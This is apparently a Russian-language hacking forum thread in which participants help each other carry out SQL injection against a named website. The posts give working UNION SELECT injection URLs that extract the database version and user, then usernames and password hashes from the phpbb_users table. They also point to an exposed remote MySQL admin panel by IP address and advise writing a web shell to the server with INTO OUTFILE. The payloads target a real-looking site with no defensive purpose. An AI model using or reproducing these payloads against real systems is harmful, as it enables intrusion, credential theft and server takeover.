http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),6,7,8,9/* кто поможет выудить пасс к мусклу если чо вот удалённый доступ к мусклу http://81.177.9.37:911/administration/mysql/index.php
можно узнать пароль админа на форуме потом через форум можно залить шелл .. и будет тебе счастье попробуй такие идеи http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),6,7,8,9/* это для технической информации также можешь узнать пароль и имена пользователей таблица phpbb_users поля username user_password
Вот отличная статья, там все написано https://forum.antichat.ru/showthread.php?t=19605 Смотри пункт 4)Получить шелл Ах да, файл НЕ заливают через LOAD_FILE() его читают. А заливают через into+outfile+'/ПУТЬ/ИМЯ_ФАЙЛА'
тут 4 версия мы можем только подобрать таблицы. information_schema.tables есть только в 5 версии и выше
по твоей подсказке сделал такой запрос http://evo.nightspirits.net/indexframe.php?razdel=news&comm=1'+and+1=2+union+select+1,2,3,4,username,user_password,7,8,9+from+phpbb_users/* но почемут не видно данных базы.
Юзай лимит Х,Х http://evo.nightspirits.net/indexframe.php?razdel=news&comm=1'+and+1=2+union+select+1,2,3,4,username,user_password,7,8,9+from+phpbb_users+limit+1,1/*
